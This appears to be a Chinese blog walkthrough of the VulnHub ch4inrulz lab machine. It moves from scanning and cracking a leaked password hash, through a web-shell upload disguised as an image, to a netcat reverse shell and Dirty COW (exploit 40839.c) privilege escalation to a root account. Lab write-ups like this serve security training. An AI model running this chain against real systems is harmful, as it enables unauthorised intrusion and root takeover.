• VulnHub ch4inrulz: 1.0.1


    1. 🍬 博主介绍
    2. 👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
    3. ✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
    4. 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
    5. 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
    6. 🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

    一、信息收集

    1.扫描开发端口

    开发了21、22、80、8011端口

    访问80端口

    没有发现什么有价值的信息

    访问8011端口

    目前也没有发现什么有价值的信息

    2.扫描目录

    1. 几个dirb常用的字典路径
    2. /usr/share/dirb/wordlists/big.txt #大字典
    3. /usr/share/dirb/wordlists/common.txt #公共字典
    4. /usr/share/dirb/wordlists/extensions_common.txt #常用文件扩展名字典
    5. /usr/share/dirb/wordlists/mutations_common.txt #备份扩展名
    1. ┌──(root💀kali)-[~/桌面]
    2. └─# dirb http://192.168.103.184

    发现有一个/development目录

    发现需要账号密码登录

    所以现在需要信息收集,找账号密码

    扫描.bak文件

    一般账户密码可能在.bak文件下

    尝试扫描一下.bak文件

    1. ┌──(root💀kali)-[~/桌面]
    2. └─# dirb http://192.168.103.184 -X .bak

    http://192.168.103.184/index.html.bak

    1. ┌──(root💀kali)-[~/桌面]
    2. └─# curl http://192.168.103.184/index.html.bak #读取这个.bak文件
    3. 用户名和密码:frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
    4. ┌──(root💀kali)-[~/桌面]
    5. └─# john 1.txt
    6. 账号密码:
    7. frank:frank!!!

    登录成功:

    1. **这是我未完成的工具清单
    2. - 上传工具(已完成但需要安全审查)**

    有个上传的地方???最终找到上传的地方!!!

    上传完一个.jpg后缀的木马文件,结果:提示上传成功

    再扫一下8011端口下的目录
    1. ┌──(root💀kali)-[~/桌面]
    2. └─# dirb http://192.168.103.184:8011

    发现有这个目录:

    /api/index.html目录

    试着登录files_api_php目录

    试着读下/development/uploader/upload.php目录下的upload.php文件

    利用base64编码读取

    网站根路径+FRANKuploads/上传文件名

    二、漏洞利用

    1.利用php脚本反弹shell

    1. ┌──(root💀kali)-[~/桌面]
    2. └─# nc -lvvp 4444
    3. python -c 'import pty; pty.spawn("/bin/bash")' #交互式shell
    直接查看内核:uname -a

    2.脏牛提权

    1. searchsploit Dirty
    2. 先下载到本地:cp /usr/share/exploitdb/exploits/linux/local/40839.c ~

    1. 先切换到a目录下,a目录有可写权限
    2. 然后进行nc端口监听,开始的反弹shell用了4444端口,所以4444不能再用了
    3. www-data@ubuntu:/var/a$ nc -l 1234 > 40839.c
    4. nc -l 1234 > 40839.c
    5. ┌──(root💀kali)-[~/桌面]
    6. └─# nc 192.168.103.184 1234 < 40839.c
    1. gcc -pthread 40839.c -o dirty -lcrypt
    2. ./dirty 密码

    3.ssh连接登录firefart账号(root权限)

    1. 账户:firefart
    2. 密码:12345

    4.flag

  • 相关阅读:
    【LeetCode】每一轮都要把输入数组看一遍的二分
    竞价推广流程
    echarts 实现渐变的仪表盘
    vue中如何获取到当前位置的天气
    【项目原理】ESP12F作无线网卡
    王府街10号院团建笔记
    自动化测试基础篇:Selenium 框架设计(POM)
    考研回忆录【二本->211】
    Nginx Rewrite
    Wordpress模板主题中functions.php常用功能代码与常用插件(持续收集整理)
  • 原文地址:https://blog.csdn.net/SENMINGya/article/details/133977211